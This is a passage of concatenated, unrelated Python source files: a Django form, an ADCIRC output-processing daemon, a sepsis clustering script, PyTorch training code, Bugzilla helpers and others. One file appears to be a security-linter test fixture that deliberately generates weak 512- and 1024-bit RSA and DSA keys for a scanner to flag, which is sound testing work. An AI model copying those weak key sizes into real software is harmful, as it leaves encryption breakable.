    dados = pd.DataFrame(anuncio, columns=['NomeAnúncio', 'Cliente', 'DataInício', 'DataFinal', 'Quant.Dias', 'Invest.Diário'])
    dados = dados.loc[dados['Cliente'] == input(f'Digite o nome do cliente: ')]
    print(dados)
# Main system loop: show the menu until the user chooses option 4 (exit).
# NOTE(review): a non-numeric entry raises ValueError and aborts the program;
# other unrecognized numbers silently re-show the menu.
while True:
    menu = int(input('''
    Deseja:
    [1] - Cadastrar Anúncios
    [2] - Visualizar Anúncios
    [3] - Filtrar por Cliente
    [4] - Sair
    '''))
    if menu == 1:
        cadastro()
    elif menu == 2:
        visualizar()
    elif menu == 3:
        filtro()
    elif menu ==4:
        print('Cadastros finalizados.')
        break
|
from django import forms
from .models import UserAccount
class UserAccountForm(forms.ModelForm):
    """ModelForm for a user's default delivery details.

    Placeholder text replaces the visible label on every field except the
    country selector, which renders its own option widget.
    """
    class Meta:
        model = UserAccount
        fields = ('default_first_name', 'default_last_name', 'default_phone_number',
                  'default_street_address1', 'default_street_address2',
                  'default_town_or_city', 'default_postcode',
                  'default_county', 'default_country')

    def __init__(self, *args, **kwargs):
        """Attach placeholders and strip labels from all rendered fields."""
        super().__init__(*args, **kwargs)
        placeholders = {
            'default_first_name': 'First Name',
            'default_last_name': 'Last Name',
            'default_phone_number': 'Phone Number',
            'default_postcode': 'Postal Code',
            'default_town_or_city': 'Town or City',
            'default_street_address1': 'Street Address 1',
            'default_street_address2': 'Street Address 2',
            'default_county': 'County or Region',
        }
        # Apply placeholders
        for field in self.fields:
            if field != 'default_country':
                placeholder = placeholders[field]
                self.fields[field].widget.attrs['placeholder'] = placeholder
            # Remove the field labels
            self.fields[field].label = False
|
from rest_framework import serializers
from teams.serializer import TeamSerializer
from .models import Match
class MatchSerializer(serializers.ModelSerializer):
    """Read-oriented serializer for Match: nests both teams and the winner,
    and exposes the human-readable phase label."""
    away_team = TeamSerializer(many=False)
    home_team = TeamSerializer(many=False)
    # Serializes the display value of the model's `phase` choices field.
    phase = serializers.CharField(source='get_phase_display')
    winner = TeamSerializer(many=False)

    class Meta:
        model = Match
        fields = [
            'id',
            'away_team',
            'home_team',
            'away_team_goals',
            'home_team_goals',
            'played',
            'phase',
            'winner',
        ]
|
import os
import pdb
import glob
import json
import dask
import logging
import datetime
import argparse
import subprocess
import numpy as np
import pandas as pd
import xarray as xa
import random as rand
from adcirc_utils import *
from time import perf_counter, sleep
from array import array
from contextlib import contextmanager
logger = logging.getLogger()
@contextmanager
def timing(label: str):
    """Context manager that times its body.

    Yields a zero-argument callable; once the with-block has exited it
    returns ``(label, elapsed_seconds)``. Calling it *inside* the block
    raises NameError, because the end timestamp is only captured on exit
    (late binding of the closure variable).
    """
    started = perf_counter()
    yield lambda: (label, finished - started)
    finished = perf_counter()
def process_run_data(job_dir:str, nodes=[], param='wind_drag_parameter',
        purge_runs:bool=False, update_interval:int=20):
    """Post-process active ADCIRC run directories under ``<job_dir>/runs``.

    For each run directory not yet prefixed ``DONE-``: collect the
    ``ts_start_``/``ts_adcprep_``/``ts_padcirc_`` timestamp marker files,
    read the sampled attribute values for ``param`` from the run's
    ``fort.13``, and invoke the external ``proc_fort.sh`` script to annotate
    and copy ``fort.63.nc`` into ``<job_dir>/outputs/raw``. Runs whose
    ``ts_padcirc_*`` marker exists are then purged (``purge_runs=True``) or
    renamed with a ``DONE-`` prefix.

    NOTE(review): ``nodes`` (a mutable default) and ``update_interval`` are
    never used in this body — confirm they are intentional.
    """
    # Get active jobs in directory
    active_runs = [x for x in os.listdir(os.path.join(job_dir, 'runs')) if not x.startswith('DONE-')]
    # Make raw data dir if doesn't exist
    raw_data_dir = os.path.join(job_dir, 'outputs', 'raw')
    # Loop through active jobs
    for idx, r in enumerate(active_runs):
        logger.info(f"Processing active run {r} - {idx+1}/{len(active_runs)}")
        # See if end timestamp is present yet. If so mark job as done and ready to clean up
        res = glob.glob(os.path.join(job_dir, 'runs', r, "ts_padcirc_*"))
        job_done = True if len(res)>0 else False
        # Read TS marker files into [start, adcprep, padcirc] epoch seconds.
        # NOTE(review): glob returns full paths, so str.startswith(f, 'ts_...')
        # only matches bare names — verify this ever fires as intended.
        job_ts = np.zeros(3)
        for f in glob.glob(os.path.join(job_dir, 'runs', r, 'ts_*')):
            if str.startswith(f, 'ts_start_'):
                job_ts[0] = datetime.datetime.strptime(str.split(f, 'ts_start_')[1],
                        "%Y-%m-%d-%H:%M:%S").timestamp()
            if str.startswith(f, 'ts_adcprep_'):
                job_ts[1] = datetime.datetime.strptime(str.split(f, 'ts_adcprep_')[1],
                        "%Y-%m-%d-%H:%M:%S").timestamp()
            if str.startswith(f, 'ts_padcirc_'):
                job_ts[2] = datetime.datetime.strptime(str.split(f, 'ts_padcirc_')[1],
                        "%Y-%m-%d-%H:%M:%S").timestamp()
        # Get param vals for sample
        f13 = read_fort13(os.path.join(job_dir, 'runs', r, 'fort.13'))
        n_vals = f13['ValuesPerNode'].sel(AttrName=param).item(0)
        p_vals = ','.join([str(f13[f'v{x}'].sel(AttrName=param).item(0)) for x in range(n_vals)])
        # Expressions handed to proc_fort.sh (presumably ncap2 syntax) that
        # embed the parameter sample and job timestamps into the output file.
        ncap_str_1 = f'defdim("param",{n_vals});p_vals[$param]={{{p_vals}}}'
        ncap_str_2 = 'defdim("jc",3);job_ts[$jc]={' + ','.join([str(x) for x in job_ts]) + '}'
        # Process fort.63 File with proc_fort.sh shell script
        sample_type = r.split('_')[1]
        sample_num = r.split('_')[2]
        logger.debug(f"Processing fort.63.nc file.")
        f63 = os.path.join(job_dir, 'runs', r, 'fort.63.nc')
        cf63 = os.path.join(raw_data_dir, '.'.join([sample_type, sample_num]) + '.fort.63.nc')
        proc = subprocess.Popen(["proc_fort.sh", sample_num, f63, cf63, ncap_str_1, ncap_str_2],
                stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        out, err = proc.communicate()
        out = out.decode('utf-8')
        # First 16 lines contain lmod print - no error
        err = '\n'.join(err.decode('utf-8').split('\n')[16:])
        if err!='':
            logger.error(f"Unable to clean fort.63.nc for run {r} - {err}")
        else:
            logger.info("Successfully cleaned fort.63.nc file.")
        # if job_done ts set, then read job completion timestamps
        if job_done:
            # Clean run directory if purge is set
            rdir = os.path.join(job_dir, 'runs', r)
            if purge_runs:
                logger.info(f"Purging run directory {rdir}")
                res = subprocess.run(["rm", "-rf", rdir])
            else:
                done_rdir = os.path.join(job_dir, 'runs', 'DONE-' + r)
                logger.info(f"Moving run directory {rdir} to DONE")
                res = subprocess.run(["mv", rdir, done_rdir])
def pull_data_netcdf(job:str, ds_name:str, configs:dict):
    """Assemble one requested dataset from the raw per-run netCDF files.

    Reads up to ``samples`` files matching the request's ``sample_type`` from
    ``<job>/outputs/raw``, trims each to the requested time window and node
    list, concatenates along a new ``sample`` dimension, and writes the
    result to ``<job>/outputs/requests/<ds_name>.nc``.

    Returns the concatenated xarray Dataset, or None when nothing loaded.

    NOTE(review): ``randomize`` is popped from the config but never used.
    """
    sample_size = configs[ds_name].pop('samples', 100)
    sample_type = configs[ds_name].pop('sample_type', 'uniform')
    nodes = configs[ds_name].pop('nodes', [])
    start_time = configs[ds_name].pop('start_time', None)
    end_time = configs[ds_name].pop('end_time', None)
    randomize = configs[ds_name].pop('randomize', False)

    def pre_proc(ds, st=start_time, et=end_time, n=nodes):
        # Drop static mesh variables the request doesn't need.
        ds = ds.drop_vars(['adcirc_mesh', 'depth', 'element', 'ibtype', 'ibtypee', 'max_nvdll', 'max_nvell', 'nvdll', 'nvell'])
        # Default to the file's full time range when no window was given.
        st = ds['time'][0] if st==None else st
        et = ds['time'][-1] if et==None else et
        ds = ds.sel(time=slice(st, et))
        # NOTE(review): uses the closed-over `nodes`, not the parameter `n`
        # (same value here, but confirm `n` isn't meant to vary per call).
        ds = ds.sel(node=nodes)
        ds = ds.assign_coords(param=[('\lambda_'+str(x)) for x in range(len(ds['p_vals']))])
        ds = ds.assign_coords(node=nodes)
        # One sample per file; promote its id into a `sample` dimension.
        ds = ds.expand_dims({"sample":[ds['p_vals'].attrs['sample']]})
        output = xa.Dataset({"param_samples": ds['p_vals'],
                "water_levels": ds['zeta'].transpose("node",...)})
        return output

    sample_type = (sample_type + '.') if sample_type != '' else sample_type
    sample_files = glob.glob(os.path.join(job, 'outputs', 'raw', sample_type + '*.nc'))
    # Clamp the request to however many files actually exist.
    sample_size = len(sample_files) if sample_size>len(sample_files) else sample_size
    sample_files = sample_files[0:sample_size]
    all_ds = []
    logger.info(f"Pulling data from {sample_size} data files.")
    # logger.info("Files = %s" % ','.join([sample_files]))
    for i, s in enumerate(sample_files):
        logger.info(f"Processing {s} - {i}/{sample_size}")
        try:
            ds = xa.open_dataset(s)
        except Exception as e:
            # Skip unreadable files rather than failing the whole request.
            logger.error(f"Unable to load {s} - {e}")
            continue
        all_ds.append(pre_proc(ds))
        ds.close()
    if len(all_ds)>0:
        logger.info(f"Concatenating {len(all_ds)} datasets.")
        output = xa.concat(all_ds, "sample")
        fpath = os.path.join(job, 'outputs', 'requests', ds_name + '.nc')
        logger.info(f"Writing output dataset to {fpath}")
        output.to_netcdf(fpath)
        output.close()
        # Unknown error occuring with open_mfdataset
        # pdb.set_trace()
        # logger.info(f"Pulling data from {sample_size} data files.")
        # logger.info("Files = %s" % ','.join([sample_files]))
        # with xa.open_mfdataset(sample_files, parallel=True, preprocess=pre_proc) as ds:
        #     fpath = os.path.join(job, 'outputs', ds_name + '.nc')
        #     logger.info(f"Writing output netcdf file to {fpath}")
        #     output.to_netcdf(fpath)
        return output
    else:
        return None
def load_configs(config_dir:str):
    """Load every pending JSON request config from *config_dir*.

    Hidden files and configs already marked ``.done`` / ``.error`` are
    skipped; configs that fail to parse are logged and ignored.
    Returns ``{name (filename sans .json): parsed JSON}``.
    """
    res = {}
    for conf in os.listdir(config_dir):
        finished = conf.startswith('.') or conf.endswith('.done') or conf.endswith('.error')
        if finished:
            continue
        try:
            name = conf.split('.json')[0]
            with open(os.path.join(config_dir, conf), 'r') as cf:
                res[name] = json.load(cf)
        except Exception as e:
            logger.info(f"Unable to load config {conf} - {e}.")
    return res
def main_loop(job_dir:str, update_interval:int=30):
    """Polling daemon: process ADCIRC run outputs and service data requests.

    Every ``update_interval`` seconds: load request configs from
    ``<job_dir>/out_data_configs``, resolve requested coordinates to mesh
    nodes, process newly finished runs, and materialize each request via
    pull_data_netcdf(). An ``END-DP`` file in ``job_dir`` stops the loop.
    """
    logger.info(f"Loading base adcirc configs.")
    adcirc_configs = process_adcirc_configs(os.path.join(job_dir,'base_inputs'))
    # Make raw data dir if doesn't exist
    raw_data_dir = os.path.join(job_dir, 'outputs', 'raw')
    res = subprocess.run(["mkdir", "-p", raw_data_dir])
    # Make data output dir if doesn't exist
    data_dir = os.path.join(job_dir, 'outputs', 'requests')
    res = subprocess.run(["mkdir", "-p", data_dir])
    global_nodes = []
    while True:
        # An END-DP sentinel file terminates the daemon (and is removed).
        if len(glob.glob(os.path.join(job_dir, 'END-DP')))>0:
            res = subprocess.run(["rm", os.path.join(job_dir, 'END-DP')])
            logger.info("Found END-DP file - Terminating data processing.")
            break
        # Load data request configs
        configs = load_configs(os.path.join(job_dir, 'out_data_configs'))
        # Iterate over a snapshot of the keys: the 'global' entry is removed
        # inside the loop, and removing from a dict while iterating its live
        # key view raises RuntimeError.
        for name in list(configs.keys()):
            logger.info(f"Found config {name}")
            if 'coordinates' in configs[name].keys():
                logger.info(f"Calculating nodes closest to coordiantes.")
                for coord in configs[name]['coordinates']:
                    configs[name]['nodes'].append(find_closest(adcirc_configs['X'].values,
                                                               adcirc_configs['Y'].values,
                                                               coord[0], coord[1]))
                # De-duplicate and order the node list.
                configs[name]['nodes'] = sorted(set(configs[name]['nodes']))
            if name=='global':
                logger.info(f"Found global config! Updating global node list.")
                global_nodes = configs[name]['nodes']
                # BUG FIX: dict has no .drop() method (that's pandas) — the
                # original raised AttributeError whenever a 'global' config
                # existed. pop() removes it so it isn't pulled as data below.
                configs.pop('global')
        # Process run data
        res = process_run_data(job_dir, nodes=global_nodes)
        # Now process each data pull request config. If successful, then delete request config
        for name in configs.keys():
            # try:
            msg = f"Processing data request {name}\n"
            msg += f"Nodes: {configs[name]['nodes']}\n"
            msg += f"Start Time: {configs[name]['start_time']}\n"
            msg += f"End Time: {configs[name]['end_time']}\n"
            logger.info(msg)
            with timing(name) as pull_data:
                res = pull_data_netcdf(job_dir, name, configs)
            logger.info(f"Processed data request {name} successfully! Moving to done status.")
            logger.info('Total [%s]: %.6f s' % pull_data())
            # res = subprocess.run(["mv", os.path.join(job_dir, 'out_data_configs', name+'.json'),
            #                       os.path.join(job_dir, 'out_data_configs', name+'.json.done')])
            # except Exception as e:
            #     logger.info(f"Unable to pull data for request {name} - {e}. Moving to error status.")
            #     res = subprocess.run(["mv", os.path.join(job_dir, 'out_data_configs', name+'.json'),
            #                           os.path.join(job_dir, 'out_data_configs', name+'.json.error')])
        # Sleep until we update data again
        logger.info(f"Sleeping for {update_interval} seconds.")
        sleep(update_interval)
if __name__ == "__main__":
    # Parse command line options
    parser = argparse.ArgumentParser()
    parser.add_argument('job_dir', type=str, help='Full path to job directory.')
    parser.add_argument('-m', '--mode', choices=['MAIN', 'PULL_DATA'], type=str,
            default='MAIN', help='Mode to run. Defauls to main execution.')
    parser.add_argument('-u', '--update_interval', type=int, default=300,
            help="Data pull wait time in seconds.")
    parser.add_argument('-lf', '--log_file', type=str, default=None, help="Path to log file.")
    parser.add_argument('-ll', '--log_level', type=str, default='INFO',
            choices=['DEBUG','INFO','WARNING','ERROR','CRITICAL'], help='Set the logging level')
    args = parser.parse_args()
    # Initialize logger: to a file when requested, otherwise default stream.
    if args.log_file!=None:
        logging.basicConfig(level=args.log_level, filename=args.log_file,
                format='%(asctime)s %(levelname)-8s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
    else:
        logging.basicConfig(level=args.log_level,
                format='%(asctime)s %(levelname)-8s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
    # BUG FIX: the original had a bare `while True: main_loop(...)` here that
    # ran before — and made unreachable — the mode check and error handling
    # below. The retry loop now wraps the guarded call instead.
    while True:
        try:
            if args.mode=='MAIN':
                # Call main loop
                main_loop(args.job_dir, update_interval=args.update_interval)
            else:
                # BUG FIX: missing f-prefix meant the mode name was never
                # interpolated into the error message.
                raise Exception(f"Unrecognized mode {args.mode}")
        except Exception as e:
            # Shouldn't get here. But keep retrying if not in PULL_DATA Mode
            logger.critical("Unexpected error encountered!")
|
class myTest:
    # NOTE(review): importing inside the class body binds `pry` as a *class
    # attribute* (the module object), which is unconventional — consider a
    # top-of-file import instead.
    import pry
    def __init__(self, val):
        # Builds the instance label; assumes val is a str — TODO confirm.
        self.interface = "test" + val
    def dodo(self):
        print(self.interface)
        # NOTE(review): `self.pry` resolves to the imported module object;
        # whether calling it works depends on the pry package making its
        # module callable — verify, otherwise this raises TypeError.
        self.pry()
import os
import numpy as np
# Paths into the DAVIS dataset layout used by this project.
dataset_folder = '/home/priya/code/data_volume/timecycle'
outlist = os.path.join(dataset_folder, 'davis/DAVIS/vallist.txt')
imgfolder = os.path.join(dataset_folder, 'davis/DAVIS/JPEGImages/480p/')
lblfolder = os.path.join(dataset_folder, 'davis/DAVIS/Annotations/480p/')
# Read the validation sequence names (one per line, trailing newline dropped).
# Context managers (a fix over the bare open/close) guarantee the files are
# closed even if listing a sequence directory below raises.
jpglist = []
with open(os.path.join(dataset_folder, 'davis/DAVIS/ImageSets/2017/val.txt'), 'r') as f1:
    for line in f1:
        jpglist.append(line[:-1])
# Emit "<image dir> <annotation dir>" pairs for sequences with more than
# 20 frames (shorter clips are skipped).
with open(outlist, 'w') as f:
    for fname in jpglist:
        fnameim = imgfolder + fname + '/'
        fnamelbl = lblfolder + fname + '/'
        if len(os.listdir(fnameim)) > 20:
            f.write(fnameim + ' ' + fnamelbl + '\n')
|
import os, sys
# Legacy Python 2 WSGI bootstrap for an old-style Django deployment
# (execfile on line below is Python 2 only).
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
PROJECT_NAME = os.path.basename(PROJECT_ROOT)
# Put the project and its parent on sys.path so `<project>.settings` imports.
sys.path.insert(0, PROJECT_ROOT)
sys.path.insert(0, os.path.abspath(os.path.join(PROJECT_ROOT, os.pardir)))
# Activate the virtualenv assumed to live three directories up.
venv_path = os.path.abspath(os.path.join(PROJECT_ROOT, "../../../"))
activate_this = os.path.join(venv_path, "bin/activate_this.py")
execfile(activate_this, dict(__file__=activate_this))
sys.stderr.write("WSGI Python Path (Importer): %s\n" % sys.path)
os.environ['DJANGO_SETTINGS_MODULE'] = '%s.settings' % PROJECT_NAME
import django.core.handlers.wsgi
# Old-style (pre-1.4) Django WSGI entry point.
application = django.core.handlers.wsgi.WSGIHandler()
|
from cryptography.hazmat import backends
from cryptography.hazmat.primitives.asymmetric import dsa
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.asymmetric import rsa
from Crypto.PublicKey import DSA
from Crypto.PublicKey import RSA
# NOTE(review): this appears to be a security-linter test fixture — the
# "Incorrect" sections intentionally generate weak (<2048-bit) keys so a
# scanner can flag them. Do not "fix" the weak key sizes.
# Correct
dsa.generate_private_key(key_size=2048,
                         backend=backends.default_backend())
rsa.generate_private_key(public_exponent=65537,
                         key_size=2048,
                         backend=backends.default_backend())
DSA.generate(bits=2048)
RSA.generate(bits=2048)
# Also correct: without keyword args
dsa.generate_private_key(4096,
                         backends.default_backend())
ec.generate_private_key(ec.SECP256K1,
                        backends.default_backend())
rsa.generate_private_key(3,
                         4096,
                         backends.default_backend())
DSA.generate(4096)
RSA.generate(4096)
# Incorrect: weak key sizes
dsa.generate_private_key(key_size=1024,
                         backend=backends.default_backend())
rsa.generate_private_key(public_exponent=65537,
                         key_size=1024,
                         backend=backends.default_backend())
DSA.generate(bits=1024)
RSA.generate(bits=1024)
# Also incorrect: without keyword args
dsa.generate_private_key(512,
                         backends.default_backend())
ec.generate_private_key(ec.SECT163R2,
                        backends.default_backend())
rsa.generate_private_key(3,
                         512,
                         backends.default_backend())
DSA.generate(512)
RSA.generate(512)
|
import schedule
import time
import days2 as d
import stopRunning2 as stp
# Register one job per weekday at midnight; most days share the common
# handler, while Wednesday/Thursday midnight queue the Thursday/Friday
# variants respectively (handlers live in days2).
schedule.every().friday.at("00:00").do(d.mondayToWednesdayAndWeekendPrayer)
schedule.every().sunday.at("00:00").do(d.mondayToWednesdayAndWeekendPrayer)
schedule.every().monday.at("00:00").do(d.mondayToWednesdayAndWeekendPrayer)
schedule.every().tuesday.at("00:00").do(d.mondayToWednesdayAndWeekendPrayer)
schedule.every().saturday.at("00:00").do(d.mondayToWednesdayAndWeekendPrayer)
schedule.every().wednesday.at("00:00").do(d.thursdayPrayer)
schedule.every().thursday.at("00:00").do(d.fridayPrayer)
# Daily stop job at 00:21 (stopRunning2.stopRec).
schedule.every().day.at("00:21").do(stp.stopRec)
# Poll pending jobs once per second, forever.
while True:
    schedule.run_pending()
    time.sleep(1)
|
import numpy as np
from sklearn.cluster import KMeans
import pickle as pkl
print ('data preparing ...')
# read the src
datapath = '../../data/'
data = np.genfromtxt(datapath + 'Sepsis_imp.csv', dtype=float, delimiter=',', skip_header=1)
# remove intervention, but include ventilation, sedation, RRT
interventions = np.setdiff1d(np.arange(47, 57), [51,52,54,55,56]) #[52,53,55,57]
data = np.delete(data, interventions, axis=1)
# Drop the first three columns (presumably identifiers — TODO confirm).
data = np.delete(data, [0,1,2], axis=1)
# Z-score normalize each feature column before clustering.
data = (data - np.mean(data, axis=0)) / np.std(data, axis=0)
print ('clustering ...')
# Discretize rows into 2000 clusters; fixed seed for reproducibility.
kmeans = KMeans(n_clusters=2000, random_state=0).fit(data)
states_list = kmeans.labels_
centers = kmeans.cluster_centers_
# Persist per-row cluster assignments and centroids for downstream use.
pkl.dump(states_list, open(datapath + 'states_list.pkl', 'wb'))
pkl.dump(centers, open(datapath + 'centers.pkl', 'wb'))
|
# For each test case: maximize (min of the first k elements) * k over all
# prefix lengths k of the array.
# NOTE(review): the original was incomplete — the winning candidate was
# discarded (`pass`) and nothing was printed; both are assumed intent here.
for _ in range(int(input())):
    n = int(input())
    arr = list(map(int, input().split()))
    max_ans = 0
    # BUG FIX: the original used 0 as the "unset" sentinel for the running
    # minimum, which broke on arrays containing 0; use None instead.
    prefix_min = None
    for length, value in enumerate(arr, start=1):
        if prefix_min is None or value < prefix_min:
            prefix_min = value
        candidate = prefix_min * length
        if candidate > max_ans:
            # BUG FIX: original body was `pass`, discarding the answer.
            max_ans = candidate
    print(max_ans)
# WORK IN PROGRESS
class Flatten(nn.Module):
    """Flattens (N, C, H, W) input to (N, C*H*W) so it can feed nn.Linear."""
    def forward(self, x):
        # BUG FIX: the method must be named `forward` and take `self` —
        # the original `def flatten(x)` was never invoked by
        # nn.Module.__call__, so the layer did nothing usable.
        N = x.shape[0]  # read in N, C, H, W
        return x.view(N, -1)  # "flatten" the C * H * W values into a single vector per image
# Hyperparameters for a simple two-layer fully-connected classifier.
hidden_layer_size = 4000
learning_rate = 1e-2
input_dim = 20
num_channels = 3
# NOTE(review): `nn` and `optim` are assumed to be torch.nn / torch.optim
# imported earlier in the notebook — confirm.
model = nn.Sequential(
    Flatten(),
    nn.Linear(input_dim * input_dim * num_channels, hidden_layer_size),
    nn.ReLU(),
    nn.Linear(hidden_layer_size, 10)
)
# you can use Nesterov momentum in optim.SGD
optimizer = optim.SGD(model.parameters(), lr=learning_rate,
                      momentum=0.9, nesterov=True)
# loader_train = DataLoader(cifar10_train, batch_size=64,
#                           sampler=sampler.SubsetRandomSampler(range(NUM_TRAIN)))
def train(model, optimizer, epochs=1):
    """Train *model* on `loader_train` for *epochs* epochs with plain SGD.

    NOTE(review): relies on notebook globals `loader_train`, `loader_val`,
    `device`, `dtype`, `print_every` and `check_accuracy_part34` — none are
    defined in this chunk; confirm they exist before running.
    """
    model = model.to(device=device)  # move the model parameters to CPU/GPU
    for e in range(epochs):
        for t, (x, y) in enumerate(loader_train):
            model.train()  # put model to training mode
            x = x.to(device=device, dtype=dtype)  # move to device, e.g. GPU
            y = y.to(device=device, dtype=torch.long)
            scores = model(x)
            loss = F.cross_entropy(scores, y)
            # Standard step: clear grads, backprop, update parameters.
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
            if t % print_every == 0:
                print('Iteration %d, loss = %.4f' % (t, loss.item()))
                check_accuracy_part34(loader_val, model)
                print()

train(model, optimizer)
import bugzilla
import configuration
import logging
# Bugzilla endpoint and default product/component come from the shared
# configuration module; the API client is created once at import time.
URL = configuration.get_config(parameter_type='bugzilla-creds', parameter_name='bugzilla_url')
bzapi = bugzilla.Bugzilla(URL)
default_product = configuration.get_config(parameter_type='default-params', parameter_name='default_product')
default_component = configuration.get_config(parameter_type='default-params', parameter_name='default_component')
def normalize_component_new(selected_component, selected_product):
    """Map a component name back to Bugzilla's canonical casing.

    Falls back to the default product when none is given; returns '' for an
    empty component. NOTE(review): when the component is not found this only
    prints and implicitly returns None — confirm callers handle both '' and
    None. Also assumes `selected_component` is already lower-cased.
    """
    # TODO Temporary fix. Figure out why sometimes None product
    # print('default product is: ' + default_product + ' and default component is: ' + default_component)
    if not selected_product:
        selected_product = default_product
    components = bzapi.getcomponents(product=selected_product)
    lowered_components = [item.lower() for item in components]
    if not selected_component:
        return ''
    if selected_component in lowered_components:
        # Return the original (canonically cased) name at the same index.
        index = lowered_components.index(selected_component)
        return components[index]
    else:
        print('selected component is not in there')
def normalize_product_new(selected_product):
    """Map a product name (case-insensitively) to Bugzilla's canonical name.

    Products whose name *and* id are purely numeric are skipped.
    NOTE(review): when no match is found this only prints and implicitly
    returns None — confirm callers handle that.
    """
    if not selected_product:
        selected_product = default_product
    include_fields = ["name", "id"]
    products = bzapi.getproducts(include_fields=include_fields)
    products_list = []
    for product in products:
        # The two returned fields arrive in unspecified order; pick whichever
        # one looks like a name (see isproductalpha below).
        single_product1 = str(list(product.values())[0])
        single_product2 = str(list(product.values())[1])
        if not isproductalpha(single_product1) and not isproductalpha(single_product2):
            print('name and id are numbers, need to skip this product ' + single_product1 + " " + single_product2)
        else:
            if isproductalpha(single_product1):
                single_product = single_product1
            else:
                single_product = single_product2
            products_list.append(single_product)
    lowered_products = [item.lower() for item in products_list]
    if selected_product.lower() in lowered_products:
        # Return the canonically cased product at the matching index.
        index = lowered_products.index(selected_product.lower())
        return products_list[index]
    else:
        print('something\'s wrong')
def isproductalpha(product):
    """Heuristic: treat *product* as a name rather than a numeric id when it
    is purely alphabetic or contains any of the separators " -._"."""
    # TODO Fix this ugly stuff
    has_separator = any(sep in product for sep in (' ', '-', '.', '_'))
    return has_separator or product.isalpha()
"""
Runs the test dataset over the data, and stores the predictions
The arguments are loaded from a .yaml file, which is the input argument of this script
(Instructions to run: `python test_model.py <path to .yaml file>`)
"""
import os
import sys
import time
import logging
import pickle
import yaml
import numpy as np
from tqdm import tqdm
from bff_positioning.data import Preprocessor, PathCreator, create_noisy_features, \
get_95th_percentile, undersample_bf, undersample_space, sample_paths
from bff_positioning.models import CNN, LSTM, TCN
from bff_positioning.models.metrics import score_predictions
def main():
    """Run the stored model over freshly-generated test sets and score it.

    Loads the experiment .yaml given as the single CLI argument, rebuilds
    the matching model (CNN / LSTM / TCN), generates noisy or path-based
    test sets, predicts, reports distance metrics (unless MC-Dropout
    sampling is enabled), and pickles the (labels, predictions) pair next
    to the model.
    """
    start = time.time()
    logging.basicConfig(level="INFO")
    # Load the .yaml data and unpacks it
    assert len(sys.argv) == 2, "Exactly one experiment configuration file must be "\
        "passed as a positional argument to this script. \n\n"\
        "E.g. `python run_non_tracking_experiment.py <path to .yaml file>`"
    with open(sys.argv[1], "r") as yaml_config_file:
        logging.info("Loading simulation settings from %s", sys.argv[1])
        # BUG FIX: yaml.load() without an explicit Loader is unsafe on
        # untrusted input, deprecated since PyYAML 5.1, and a TypeError on
        # PyYAML >= 6; safe_load is correct for plain config data.
        experiment_config = yaml.safe_load(yaml_config_file)
    experiment_settings = experiment_config['experiment_settings']
    data_parameters = experiment_config['data_parameters']
    ml_parameters = experiment_config['ml_parameters']
    path_parameters = experiment_config['path_parameters'] \
        if 'path_parameters' in experiment_config else None
    # Loads the raw dataset
    logging.info("Loading the dataset...")
    data_preprocessor = Preprocessor(data_parameters)
    features, labels = data_preprocessor.load_dataset()
    if path_parameters:
        path_creator = PathCreator(data_parameters, path_parameters, labels)
        paths = path_creator.load_paths()
    # Undersamples the dataset (if requested)
    if "undersample_bf" in experiment_settings and experiment_settings["undersample_bf"]:
        features = undersample_bf(features, data_parameters["beamformings"])
    if "undersample_space" in experiment_settings:
        assert not path_parameters, "This option is not supported for tracking experiments, "\
            "unless the code for the path creation is updated"
        features, labels = undersample_space(features, labels, data_parameters["undersample_space"])
    # Initializes the model and prepares it for testing
    logging.info("Initializing the model (type = %s)...", experiment_settings["model_type"].lower())
    if experiment_settings["model_type"].lower() == "cnn":
        ml_parameters["input_type"] = "float"
        model = CNN(ml_parameters)
    elif experiment_settings["model_type"].lower() in ("lstm", "tcn"):
        assert path_parameters, "This model requires `paths_parameters`. See the example."
        assert path_parameters["time_steps"] == ml_parameters["input_shape"][0], "The ML model "\
            "first input dimention must match the length of the paths! (path length = {}, model)"\
            "input = {})".format(path_parameters["time_steps"], ml_parameters["input_shape"][0])
        ml_parameters["input_type"] = "bool"
        if experiment_settings["model_type"].lower() == "lstm":
            model = LSTM(ml_parameters)
        else:
            model = TCN(ml_parameters)
    else:
        raise ValueError("The simulation settings specified 'model_type'={}. Currently, only "
            "'cnn', 'lstm', and 'tcn' are supported.".format(experiment_settings["model_type"]))
    # Model weights are stored under the config file's base name.
    experiment_name = os.path.basename(sys.argv[1]).split('.')[0]
    model.load(model_name=experiment_name)
    # Prediction loop
    mc_dropout_samples = ml_parameters.get("mc_dropout", 0)
    if mc_dropout_samples:
        logging.info("Evaluation mode: MC Dropout sampling")
        tests_per_input = 1
    elif "tests_per_position" in experiment_settings:
        logging.info("Evaluation mode: Single-point position estimates")
        tests_per_input = experiment_settings["tests_per_position"]
    else:
        logging.info("Evaluation mode: Path-based position estimates")
        logging.info("Note - each set of paths will be split into 10 sub-sets, for easier RAM"
            "management -- that's why you'll see 10x test sets in the next logging messages.")
        tests_per_input = experiment_settings["tests_per_path"] * 10
    y_true = []
    y_pred = []
    for set_idx in range(tests_per_input):
        logging.info("Creating test set %2s out of %2s...", set_idx+1, tests_per_input)
        if path_parameters:
            features_test, labels_test, _ = sample_paths(
                paths["test"],
                features,
                labels,
                experiment_settings,
                data_parameters,
                path_parameters,
                sample_fraction=0.1
            )
        else:
            features_test, labels_test = create_noisy_features(
                features,
                labels,
                experiment_settings,
                data_parameters,
            )
        logging.info("Running predictions and storing data...\n")
        y_true.append(labels_test)
        if not mc_dropout_samples:  # MC Dropout OFF
            predictions_test = model.predict(features_test)
            y_pred.append(predictions_test)
        else:  # MC Dropout ON
            for sample_rnd in tqdm(range(mc_dropout_samples)):
                predictions_test = model.predict(features_test)
                y_pred.append(predictions_test)
    # Stack results and sanity check
    y_true = np.vstack(y_true)
    if mc_dropout_samples:
        # One extra axis: (examples, dims, dropout samples).
        y_pred = np.stack(y_pred, axis=2)
    else:
        y_pred = np.vstack(y_pred)
    assert y_true.shape[0] == y_pred.shape[0], \
        "The predictions and the labels must have the same number of examples!"
    assert y_true.shape[1] == y_pred.shape[1], \
        "The number of dimensions per sample must stay constant!"
    # Closes the model, gets the test scores, and stores predictions-labels pairs
    model.close()
    if not mc_dropout_samples:  # Doesn't make sense to test MCDropout samples, they underperform :)
        logging.info("Computing test metrics...")
